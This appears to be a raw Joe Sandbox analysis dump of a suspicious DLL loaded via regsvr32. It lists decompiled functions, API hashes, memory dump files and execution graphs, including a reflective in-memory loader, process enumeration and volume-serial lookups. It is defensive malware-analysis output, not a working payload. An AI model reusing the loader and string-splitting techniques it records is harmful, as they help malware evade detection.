                                                                                                                                                                                                            0x18000e094
                                                                                                                                                                                                            0x18000e099
                                                                                                                                                                                                            0x18000e09c
                                                                                                                                                                                                            0x18000e0ab
                                                                                                                                                                                                            0x18000e0b0
                                                                                                                                                                                                            0x18000e0b7
                                                                                                                                                                                                            0x18000e0cc
                                                                                                                                                                                                            0x18000e0ce
                                                                                                                                                                                                            0x18000e0d2
                                                                                                                                                                                                            0x18000e0d4
                                                                                                                                                                                                            0x18000e0d9
                                                                                                                                                                                                            0x18000e0de
                                                                                                                                                                                                            0x18000e0e4
                                                                                                                                                                                                            0x18000e0f1
                                                                                                                                                                                                            0x18000e0f6
                                                                                                                                                                                                            0x18000e0f8
                                                                                                                                                                                                            0x18000e105
                                                                                                                                                                                                            0x18000e10a
                                                                                                                                                                                                            0x18000e10c
                                                                                                                                                                                                            0x18000e119
                                                                                                                                                                                                            0x18000e11e
                                                                                                                                                                                                            0x18000e12b
                                                                                                                                                                                                            0x18000e12e
                                                                                                                                                                                                            0x18000e136
                                                                                                                                                                                                            0x18000e13a
                                                                                                                                                                                                            0x18000e145
                                                                                                                                                                                                            0x18000e147
                                                                                                                                                                                                            0x18000e14d
                                                                                                                                                                                                            0x18000e153
                                                                                                                                                                                                            0x18000e158
                                                                                                                                                                                                            0x18000e16e
                                                                                                                                                                                                            0x18000e170
                                                                                                                                                                                                            0x18000e175
                                                                                                                                                                                                            0x18000e17a
                                                                                                                                                                                                            0x18000e17c
                                                                                                                                                                                                            0x18000e180
                                                                                                                                                                                                            0x18000e187
                                                                                                                                                                                                            0x18000e18b
                                                                                                                                                                                                            0x18000e18e
                                                                                                                                                                                                            0x18000e196
                                                                                                                                                                                                            0x18000e199
                                                                                                                                                                                                            0x18000e19e
                                                                                                                                                                                                            0x18000e1ad
                                                                                                                                                                                                            0x18000e1b2
                                                                                                                                                                                                            0x18000e1b4
                                                                                                                                                                                                            0x18000e1b8
                                                                                                                                                                                                            0x18000e1bc
                                                                                                                                                                                                            0x18000e1c3
                                                                                                                                                                                                            0x18000e1c7
                                                                                                                                                                                                            0x18000e1d1
                                                                                                                                                                                                            0x18000e1e5

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000DFFC
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000E087
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                            • Opcode ID: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                                                                                                                            • Instruction ID: 0d257abc0b638f0f040665fb3b769d735b9bc0d803a768daaeded027fae08968
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7291B13261469885F7A2CF6598403ED3BA0F749BC8F14C11AFE4A67A95DF74C68AC710
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000000018000DC50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 29%
                                                                                                                                                                                                            			E0000000118000DC50(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				void* _t91;
				void* _t97;
				void* _t99;
				void* _t102;
				void* _t103;

				_a8 = __rbx;
				_a24 = __rbp;
				E0000000118000F880(0x1470, __rax, _t97, _t99);
				_t62 =  *0x80021010; // 0xc23e8d4af72c
				_a5176 = _t62 ^ _t91 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t103 = _t102 + __r8;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x800227f0 + (__edx >> 6) * 8));
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t103 >= 0) goto 0x8000dd91;
				_t67 =  &_a40;
				if (__r8 - _t103 >= 0) goto 0x8000dcfa;
				_t41 =  *__r8 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x8000dce6;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8000dcc8;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E0000000118000A154();
				if (0 == 0) goto 0x8000dd89;
				if (0 == 0) goto 0x8000dd79;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000dd89;
				if (0 + _a24 < 0) goto 0x8000dd46;
				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
				goto 0x8000dcbd;
				 *((intOrPtr*)(__rcx)) = GetLastError();
				return E000000011800010B0(_t39, 0, _a5176 ^ _t91 - __rax);
			}














                                                                                                                                                                                                            0x18000dc50
                                                                                                                                                                                                            0x18000dc55
                                                                                                                                                                                                            0x18000dc67
                                                                                                                                                                                                            0x18000dc6f
                                                                                                                                                                                                            0x18000dc79
                                                                                                                                                                                                            0x18000dc8a
                                                                                                                                                                                                            0x18000dc98
                                                                                                                                                                                                            0x18000dc9c
                                                                                                                                                                                                            0x18000dcb4
                                                                                                                                                                                                            0x18000dcba
                                                                                                                                                                                                            0x18000dcbd
                                                                                                                                                                                                            0x18000dcc3
                                                                                                                                                                                                            0x18000dccb
                                                                                                                                                                                                            0x18000dccd
                                                                                                                                                                                                            0x18000dcd8
                                                                                                                                                                                                            0x18000dcdf
                                                                                                                                                                                                            0x18000dce2
                                                                                                                                                                                                            0x18000dce6
                                                                                                                                                                                                            0x18000dcf8
                                                                                                                                                                                                            0x18000dcfa
                                                                                                                                                                                                            0x18000dd05
                                                                                                                                                                                                            0x18000dd13
                                                                                                                                                                                                            0x18000dd26
                                                                                                                                                                                                            0x18000dd2b
                                                                                                                                                                                                            0x18000dd35
                                                                                                                                                                                                            0x18000dd3e
                                                                                                                                                                                                            0x18000dd44
                                                                                                                                                                                                            0x18000dd46
                                                                                                                                                                                                            0x18000dd5b
                                                                                                                                                                                                            0x18000dd64
                                                                                                                                                                                                            0x18000dd6f
                                                                                                                                                                                                            0x18000dd77
                                                                                                                                                                                                            0x18000dd7e
                                                                                                                                                                                                            0x18000dd84
                                                                                                                                                                                                            0x18000dd8f
                                                                                                                                                                                                            0x18000ddbf

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                            • Opcode ID: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                                                                                                                            • Instruction ID: c34ad0e7ff2d66e96fda8e7ac49a4eca9b2c2d7f4ff30b46897494357c1f583c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E441A472614A8886EBA2CF25E4447EA7761F79C7D4F408022EE4E87758DF7CC645C750
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180004A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                            • Opcode ID: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                                                                                                                            • Instruction ID: 9822ff17b0ce5fbc637df8732c669b6e85e1acb8a855211156653d926a5084e0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D114C72614B4482EBA28F25F440399B7A0F788BD4F188220EE8C0B769DF38CA55CB04
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00000001800109D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ClassCursorLoadRegister
                                                                                                                                                                                                            • String ID: P
                                                                                                                                                                                                            • API String ID: 1693014935-3110715001
                                                                                                                                                                                                            • Opcode ID: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                                                                                                                            • Instruction ID: c953b54a92ac3cc4e92e902e3110dd604cc2aeb839ef1ea803bcd24b7a7bdda6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8501B232519F8486E7A18F00F89834BB7B4F388788F604119E6CD42B68DFBDC258CB40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:15.9%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                            Total number of Nodes:38
                                                                                                                                                                                                            Total number of Limit Nodes:4
                                                                                                                                                                                                            execution_graph 3052 c20000 3056 c2015a 3052->3056 3053 c2033f GetNativeSystemInfo 3054 c20377 VirtualAlloc 3053->3054 3058 c208eb 3053->3058 3055 c20395 VirtualAlloc 3054->3055 3061 c203aa 3054->3061 3055->3061 3056->3053 3056->3058 3057 c20873 3057->3058 3059 c208c6 RtlAddFunctionTable 3057->3059 3059->3058 3060 c2084b VirtualProtect 3060->3061 3061->3057 3061->3060 3061->3061 3062 252a7f0 3063 252a80b 3062->3063 3065 252a8bc 3063->3065 3066 253020c 3063->3066 3069 253022b 3066->3069 3068 2530590 3068->3065 3069->3068 3070 253e310 3069->3070 3071 253e423 3070->3071 3072 253e5f6 3071->3072 3074 25240a0 3071->3074 3072->3069 3075 2524116 3074->3075 3076 25241ca GetVolumeInformationW 3075->3076 3076->3072 3095 2542ab0 3096 2542aea 3095->3096 3097 2542c51 3096->3097 3098 253e9e8 Process32FirstW 3096->3098 3098->3096 3077 253e9e8 3080 2528bc8 3077->3080 3079 253eab4 3082 2528c02 3080->3082 3081 2528eb8 3081->3079 3082->3081 3083 2528d6f Process32FirstW 3082->3083 3083->3082 3084 25280cc 3086 25280f3 3084->3086 3085 25282ba 3086->3085 3088 253e9e8 3086->3088 3089 2528bc8 Process32FirstW 3088->3089 3090 253eab4 3089->3090 3090->3086

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00C20000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 0 c20000-c2029a call c2091c * 2 13 c202a0-c202a4 0->13 14 c20905 0->14 13->14 16 c202aa-c202ae 13->16 15 c20907-c2091a 14->15 16->14 17 c202b4-c202b8 16->17 17->14 18 c202be-c202c5 17->18 18->14 19 c202cb-c202dc 18->19 19->14 20 c202e2-c202eb 19->20 20->14 21 c202f1-c202fc 20->21 21->14 22 c20302-c20312 21->22 23 c20314-c2031a 22->23 24 c2033f-c20371 GetNativeSystemInfo 22->24 26 c2031c-c20324 23->26 24->14 25 c20377-c20393 VirtualAlloc 24->25 27 c20395-c203a8 VirtualAlloc 25->27 28 c203aa-c203ae 25->28 29 c20326-c2032a 26->29 30 c2032c-c2032d 26->30 27->28 32 c203b0-c203c2 28->32 33 c203dc-c203e3 28->33 31 c2032f-c2033d 29->31 30->31 31->24 31->26 34 c203d4-c203d8 32->34 35 c203e5-c203f9 33->35 36 c203fb-c20417 33->36 37 c203c4-c203d1 34->37 38 c203da 34->38 35->35 35->36 39 c20458-c20465 36->39 40 c20419-c2041a 36->40 37->34 38->36 41 c20537-c20542 39->41 42 c2046b-c20472 39->42 43 c2041c-c20422 40->43 44 c206e6-c206ed 41->44 45 c20548-c20559 41->45 42->41 46 c20478-c20485 42->46 47 c20424-c20446 43->47 48 c20448-c20456 43->48 51 c206f3-c20707 44->51 52 c207ac-c207c3 44->52 49 c20562-c20565 45->49 46->41 50 c2048b-c2048f 46->50 47->47 47->48 48->39 48->43 53 c20567-c20574 49->53 54 c2055b-c2055f 49->54 55 c2051b-c20525 50->55 56 c207a9-c207aa 51->56 57 c2070d 51->57 58 c2087a-c2088d 52->58 59 c207c9-c207cd 52->59 60 c2057a-c2057d 53->60 61 c2060d-c20619 53->61 54->49 64 c20494-c204a8 55->64 65 c2052b-c20531 55->65 56->52 62 c20712-c20736 57->62 80 c208b3-c208ba 58->80 81 c2088f-c2089a 58->81 63 c207d0-c207d3 59->63 60->61 68 c20583-c2059b 60->68 72 c206e2-c206e3 61->72 73 c2061f 61->73 89 c20796-c2079f 62->89 90 c20738-c2073e 62->90 70 c207d9-c207e9 63->70 71 c2085f-c2086d 63->71 66 c204aa-c204cd 64->66 67 c204cf-c204d3 64->67 65->41 65->50 75 c20518-c20519 66->75 76 c204e3-c204e7 67->76 77 c204d5-c204e1 67->77 68->61 78 c2059d-c2059e 68->78 82 c207eb-c207ed 70->82 83 c2080d-c2080f 70->83 71->63 74 c20873-c20874 71->74 72->44 84 c20625-c20648 73->84 74->58 75->55 87 c204e9-c204fc 76->87 88 c204fe-c20502 76->88 85 c20511-c20515 77->85 86 c205a0-c20605 78->86 94 c208eb-c20903 80->94 95 c208bc-c208c4 80->95 91 c208ab-c208b1 81->91 92 c207fb-c2080b 82->92 93 c207ef-c207f9 82->93 96 c20822-c2082b 83->96 97 c20811-c20820 83->97 113 c206b2-c206b7 84->113 114 c2064a-c2064b 84->114 85->75 86->86 99 c20607 86->99 87->85 88->75 106 c20504-c2050e 88->106 89->62 105 c207a5-c207a6 89->105 100 c20740-c20746 90->100 101 c20748-c20754 90->101 91->80 102 c2089c-c208a8 91->102 98 c2082e-c2083d 92->98 93->98 94->15 95->94 104 c208c6-c208e9 RtlAddFunctionTable 95->104 96->98 97->98 107 c2084b-c2085c VirtualProtect 98->107 108 c2083f-c20845 98->108 99->61 110 c2077b-c2078d 100->110 111 c20756-c20757 101->111 112 c20764-c20776 101->112 102->91 104->94 105->56 106->85 107->71 108->107 110->89 125 c2078f-c20794 110->125 116 c20759-c20762 111->116 112->110 118 c206b9-c206bd 113->118 119 c206ce-c206d8 113->119 117 c2064e-c20651 114->117 116->112 116->116 121 c20653-c20659 117->121 122 c2065b-c20666 117->122 118->119 124 c206bf-c206c3 118->124 119->84 123 c206de-c206df 119->123 126 c2068d-c206a3 121->126 127 c20676-c20688 122->127 128 c20668-c20669 122->128 123->72 124->119 129 c206c5 124->129 125->90 132 c206a5-c206aa 126->132 133 c206ac 126->133 127->126 130 c2066b-c20674 128->130 129->119 130->127 130->130 132->117 133->113
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.884530382.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_c20000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                                                                                            • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                                                                                                                            • API String ID: 394283112-3605381585
                                                                                                                                                                                                            • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                            • Instruction ID: 67b06c5aa51e8499af8920f3f8b88880698457fe6efb6411bdf370eca22be596
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B521630618B588BC719DF18E8857BAB7F1FB54304F24462EE89BC7652DB34E542CB86
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 025240A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 305 25240a0-2524136 call 2539f38 308 25241ca-2524202 GetVolumeInformationW 305->308 309 252413c-25241c4 call 252a940 305->309 309->308
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVolumeInformationW.KERNELBASE ref: 025241EB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.885272914.0000000002521000.00000020.00001000.00020000.00000000.sdmp, Offset: 02521000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_2521000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InformationVolume
                                                                                                                                                                                                            • String ID: Ql$v[
                                                                                                                                                                                                            • API String ID: 2039140958-138011117
                                                                                                                                                                                                            • Opcode ID: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                                                                                                                            • Instruction ID: 28c14543c417f0ff08b8a004723bce4ec41cf5f3a8781065285a4fa2fd7a7d87
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A313A7051CB848BD7B8DF18D48579AB7E1FB88315F60895DE88CC7295CF789888CB46
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%